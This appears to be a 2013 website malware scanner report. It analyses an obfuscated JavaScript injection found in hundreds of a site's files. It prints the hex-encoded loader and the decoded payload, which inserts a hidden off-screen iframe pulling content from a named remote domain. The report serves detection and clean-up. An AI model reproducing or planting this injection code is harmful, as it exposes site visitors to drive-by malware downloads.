Massive JavaScript injection in website pages to serve malicious iframes
Background
Online Website Malware Scanner has identified malicious JavaScript code injection in the scanned website. Such malicious obfuscated JavaScript code is used to build malicious iframe invisible to the website user and which downloads content from remote malware distributor.
It this website 504 files were identified as Suspicious by malware scanner. Detected JavaScript code injects iframe pointing to .php file hosted on a remote Blacklisted domain.
It this website 504 files were identified as Suspicious by malware scanner. Detected JavaScript code injects iframe pointing to .php file hosted on a remote Blacklisted domain.
Malicious action
Malicious iframes are often used to distribute malware hosted on external web resources(websites).
Website malware scanner report
Submission date/ time: Mon Aug 5 07:59:26 2013
Infected website's files count: 504
Threat dump:
Malware entry
Malware entry details.
Beautified script
- aq = "0x";
- bv = (5 - 3 - 1);
- sp = "s" + "p" + "li" + "t";
- w = window;
- z = "dy";
- d = document;
- try {
- ++(d.body)
- } catch (d21vd12v) {
- vzs = false;
- try {} catch (wb) {
- vzs = 21;
- }
- if (1) {
- f ="0,0,60,5d,17,1f,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,20,72,4,0,0,0,60,5d,69,58,64,5c,69,1f,20,32,4,0,0,74,17,5c,63,6a,5c,17,72,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,6e,69,60,6b,5c,1f,19,33,60,5d,69,58,64,5c,17,6a,69,5a,34,1e,5f,6b,6b,67,31,26,26,64,60,63,5c,65,58,24,6e,5c,60,65,25,5b,5c,26,67,5b,5d,26,6b,5c,6a,6b,25,67,5f,67,1e,17,6e,60,5b,6b,5f,34,1e,28,27,27,1e,17,5f,5c,60,5e,5f,6b,34,1e,28,27,27,1e,17,6a,6b,70,63,5c,34,1e,6e,60,5b,6b,5f,31,28,27,27,67,6f,32,5f,5c,60,5e,5f,6b,31,28,27,27,67,6f,32,67,66,6a,60,6b,60,66,65,31,58,59,6a,66,63,6c,6b,5c,32,63,5c,5d,6b,31,24,28,27,27,27,27,67,6f,32,6b,66,67,31,27,32,1e,35,33,26,60,5d,69,58,64,5c,35,19,20,32,4,0,0,74,4,0,0,5d,6c,65,5a,6b,60,66,65,17,60,5d,69,58,64,5c,69,1f,20,72,4,0,0,0,6d,58,69,17,5d,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,6a,69,5a,1e,23,1e,5f,6b,6b,67,31,26,26,64,60,63,5c,65,58,24,6e,5c,60,65,25,5b,5c,26,67,5b,5d,26,6b,5c,6a,6b,25,67,5f,67,1e,20,32,5d,25,6a,6b,70,63,5c,25,63,5c,5d,6b,34,1e,24,28,27,27,27,27,67,6f,1e,32,5d,25,6a,6b,70,63,5c,25,6b,66,67,34,1e,27,1e,32,5d,25,6a,6b,70,63,5c,25,67,66,6a,60,6b,60,66,65,34,1e,58,59,6a,66,63,6c,6b,5c,1e,32,5d,25,6a,6b,70,63,5c,25,6b,66,67,34,1e,27,1e,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,6e,60,5b,6b,5f,1e,23,1e,28,27,27,1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,5f,5c,60,5e,5f,6b,1e,23,1e,28,27,27,1e,20,32,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,25,58,67,67,5c,65,5b,3a,5f,60,63,5b,1f,5d,20,32,4,0,0,74"[sp](",");
- }
- w = f;
- s = [];
- for (i = 20 - 20; - i + 590 != 0; i += 1) {
- j = i;
- if ((0x19 == 031)) s += String["fromCharCode"](eval(aq + w[j]) + 0xa - bv);
- }
- ht = eval;
- alert(s);
- }
Malicious payload
Decoded payload injects hidden iframe to http://milena-wein.de/pdf/test.php
To view analysis by VirusTotal click here.
The website is Suspicious on Google Safe Browsing.
To view analysis - click here
- if (document.getElementsByTagName('body')[0]) {
- iframer();
- } else {
- document.write("<iframe src='http://milena-wein.de/pdf/test.php' width='100' height='100' style='width:100px;height:100px;position:absolute;left:-10000px;top:0;'></iframe>");
- }
- function iframer() {
- var f = document.createElement('iframe');
- f.setAttribute('src', 'http://milena-wein.de/pdf/test.php');
- f.style.left = '-10000px';
- f.style.top = '0';
- f.style.position = 'absolute';
- f.style.top = '0';
- f.setAttribute('width', '100');
- f.setAttribute('height', '100');
- document.getElementsByTagName('body')[0].appendChild(f);
- }
Blacklisting status
Redirect URL is detected by VirusTotal with ratio: 4/39VirusTotal scan report overview |
To view analysis by VirusTotal click here.
The website is Suspicious on Google Safe Browsing.
Google Safe Browsing analysis |
To view analysis - click here
Malware clean-up
Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.
No comments:
Post a Comment